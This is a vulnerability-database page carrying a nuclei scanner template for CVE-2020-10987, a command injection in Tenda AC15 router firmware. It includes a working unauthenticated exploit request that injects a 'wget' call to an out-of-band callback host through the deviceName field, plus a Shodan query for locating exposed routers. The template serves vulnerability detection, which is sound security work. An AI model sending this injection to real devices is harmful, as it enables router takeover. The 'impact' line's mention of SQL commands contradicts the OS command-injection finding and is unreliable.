Lucene search
K

Tenda AC15 AC1900 version 15.03.05.19 - Command Injection

🗓️ 04 Jul 2026 03:00:48Reported by ProjectDiscoveryType 
nuclei
 nuclei
🔗 github.com👁 12 Views

Tenda AC15 AC1900 version 15.03.05.19 suffers from critical command injection vulnerability.

Related
Refs
Code
id: CVE-2020-10987

info:
  name: Tenda AC15 AC1900 version 15.03.05.19 - Command Injection
  author: pussycat0x
  severity: critical
  description: |
    The goform/setUsbUnload endpoint of Tenda AC15 AC1900 version 15.03.05.19 allows remote attackers to execute arbitrary system commands via the deviceName POST parameter.
  impact: |
    Unauthenticated attackers can execute arbitrary SQL commands to access or modify database contents, potentially compromising the entire Tenda router and network configuration.
  remediation: |
    Upgrade to a patched firmware version or replace the affected device.
  reference:
    - https://blog.securityevaluators.com/tenda-ac1900-vulnerabilities-discovered-and-exploited-e8e26aa0bc68
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2020-10987
    cwe-id: CWE-78
    epss-score: 0.79673
    epss-percentile: 0.9956
    cpe: cpe:2.3:o:tenda:ac15_firmware:15.03.05.19:*:*:*:*:*:*:*
  metadata:
    shodan-query: http.title:"tenda wifi"
    max-request: 2
    vendor: tenda
    product: ac15_firmware
  tags: cve,cve2020,tenda,rce,kev,unauth,vkev,vuln

variables:
  payload: "wget http://{{interactsh-url}}"

flow: http(1) && http(2)

http:
  - raw:
      - |
        GET / HTTP/1.1
        Host: {{Hostname}}

    redirects: true

    matchers:
      - type: dsl
        dsl:
          - 'contains(body,"<title>Tenda WiFi")'
          - "contains(content_type, 'text/html')"
          - "status_code == 200"
        condition: and
        internal: true

  - raw:
      - |
        POST /goform/setUsbUnload HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded
        Accept: */*

        deviceName=test`;{{payload}};`

    matchers:
      - type: word
        part: interactsh_protocol
        words:
          - "http"
# digest: 4a0a00473045022100f0482fd10ded11aa860f1c717547212b839b5da7273e1d464ad96c6ae35e435e022075e14bdbe2ba1f92a8d104baa159de8c77fc50fcb7df6bd53022379c05636a37:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

04 Feb 2026 07:00Current
7.7High risk
Vulners AI Score7.7
CVSS 3.19.8
CVSS 210
EPSS0.79673
SSVC
12